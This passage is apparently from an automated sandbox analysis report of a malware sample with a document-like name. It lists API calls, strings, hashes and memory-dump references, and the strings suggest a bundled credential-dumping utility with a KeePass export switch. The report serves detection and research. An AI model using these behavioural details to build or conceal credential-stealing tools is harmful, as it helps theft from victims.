                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                              • String ID: ---
                                                                                                              • API String ID: 3437578500-2854292027
                                                                                                              • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                              • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                              Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                                              • memset.MSVCRT ref: 00410892
                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1010922700-0
                                                                                                              • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                              • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                              Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                                              • free.MSVCRT ref: 004186C7
                                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                              • free.MSVCRT ref: 004186E0
                                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                              • free.MSVCRT ref: 00418716
                                                                                                              • free.MSVCRT ref: 0041872A
                                                                                                              • free.MSVCRT ref: 00418749
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                                                              • String ID: |A
                                                                                                              • API String ID: 3356672799-1717621600
                                                                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                              Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp
                                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                              • API String ID: 2081463915-1959339147
                                                                                                              • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                              • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                              Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                              • API String ID: 2012295524-70141382
                                                                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                              Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                              • API String ID: 667068680-3953557276
                                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                              Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 1700100422-0
                                                                                                              • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                              • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                              Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                              • String ID:
                                                                                                              • API String ID: 552707033-0
                                                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                              Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                              • strchr.MSVCRT ref: 0040C140
                                                                                                              • strchr.MSVCRT ref: 0040C151
                                                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                                                              • memset.MSVCRT ref: 0040C17A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                              • String ID: 4$h
                                                                                                              • API String ID: 4066021378-1856150674
                                                                                                              • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                              • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                              Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_snwprintf
                                                                                                              • String ID: %%0.%df
                                                                                                              • API String ID: 3473751417-763548558
                                                                                                              • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                              • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                              Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                              • GetParent.USER32(?), ref: 00406136
                                                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                              • String ID: A
                                                                                                              • API String ID: 2892645895-3554254475
                                                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                              Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                              • memset.MSVCRT ref: 0040DA23
                                                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                              • String ID: caption
                                                                                                              • API String ID: 973020956-4135340389
                                                                                                              • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                              • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                              Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                              • API String ID: 1283228442-2366825230
                                                                                                              • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                              • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                              Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                              Download Yara Rule
